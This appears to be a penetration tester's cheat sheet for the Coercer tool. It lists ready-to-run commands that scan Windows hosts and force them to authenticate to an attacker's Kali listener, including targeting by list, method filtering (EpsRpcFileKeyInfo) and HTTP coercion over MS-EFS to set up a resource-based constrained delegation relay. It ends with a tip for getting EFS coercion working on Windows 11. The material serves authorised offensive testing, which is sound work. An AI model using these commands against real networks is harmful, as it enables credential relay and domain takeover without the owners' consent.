#
coercer.py
Coercer coerces things to talk to other things!
#
Scan a host to see if it can be leveraged to coerce authentication
coercer.py scan -u lowpriv -p 'pass123!' -t some.victim.host
#
Coerce auth from a victim to a system of your choice
coercer.py coerce -u 7ms -p 'pass' -t SOME.VICTIM.IP.ADDY -l LOCAL.KALI.IP.ADDY
#
Coerce using a text list of targets
coercer.py coerce -u 7ms -p 'pass' --targets-file list-of-victims.txt -l LOCAL.KALI.IP.ADDY
#
Coerce using a specific method name (that you cleaned from the SCAN mode)
This example uses EpsRpcFileKeyInfo
:
coercer.py coerce -u lowpriv -p 'password1' -t target.for.coercer.attack -l your.kali.ip.addy --filter-method-name EpsRpcFileKeyInfo
#
Coerce Web auth from a victim to pull off the RBCD attack
coercer.py coerce --auth-type http -l your.local.kali.ip -t ip.of.victim.machine -d domain.com -u lowpriv -p 'P@ssw0rd1' --filter-protocol-name MS-EFS
(More info about this in the ntlmrelay section)
#
Troubleshooting
I learned in this BloodHound Slack thread that (public) coercer shenanigans won't work on Windows 11 (at least not Win11 23H2). One user notes a way that might work to get EFS coercion to work:
EFS is not running by default on Windows 11 so that's why coercion will not work. If you can somehow drop an encrypted file on the machine, Explorer will automatically start EFS once it sees it, IIRC.